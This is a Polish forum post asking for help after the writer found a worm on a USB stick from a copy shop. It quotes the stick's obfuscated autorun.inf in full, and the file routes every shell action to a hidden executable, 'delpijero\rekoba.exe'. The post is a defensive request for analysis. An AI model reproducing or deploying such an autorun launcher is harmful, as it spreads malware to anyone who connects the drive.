Ych, korzystam czasami z różnych punktów ksero, ale żeby przywlec wira, to mi się pierwszy raz zdarzyło... Na penie znalazłem więc poniższy autorun.inf:
[autorun]
!
USEAUTOPLAY=1
shell\open\command=delpijero\rekoba.exe
;
icon=%SystemRoot%\system32\SHELL32.dll,4
:
Shell\open\command=delpijero\rekoba.exe
}
shellexecute=delpijero\rekoba.exe
@
open=delpijero\\rekoba.exe
>
shell\explore\command=delpijero\rekoba.exe
shell\install\command=delpijero\rekoba.exe
,
action=Open folder to view file using Windows Explorer
.
oraz ukryty, kosz systemowy... czyli wspomniany 'delpijero'. Autorun mam generalnie wyłączony, ale patrząc na powyższe mam jednak wątpliwości czy na pewno ani razu się ten syf nie odpalił, zwłaszcza, że wyświetlenie plików na penie trwało nieco dłużej niż zwykle. [W zasadzie to wystarczy zastąpić exeka własnym, który np. zapisuje coś do pliku... ale to wieczorem sprawdzę]
VirusTotal - http://www.virustotal.com/pl/analisis/310d8bc11054771ffb9a4034e0544af0ff0aca77ccfe900f3aa122a8a08d3d70-1274360245
Jak widać niektóre z całkiem popularnych antywirów nie widzą w pliku nic złośliwego, obawiam się jednak, że się mylą.
Jak wspomniałem - nie jestem pewien czy syf ten się odpalił... jeśli tak, to chciałbym wiedzieć czy należę teraz do botnetu spamującego viagrą, czy może powoli znikają mi wszystkie pliki z dysku... Exeka mam zachowanego, mógłbym udostępnić komuś z tutejszych eksperów, z drugiej strony nie chcę rzucać tu wirem o słabej wykrywalności, coby nikt sobie krzywdy nie zrobił :)
Tak więc - jest ktoś chętny do analizy tegoż? Pod wieczór może przygotuję sobie maszynę wirtualną i tam pozwolę temu działać, ale jeśli chodzi o analizę kodu tych rozmiarów to jednak jestem zbyt cienki :)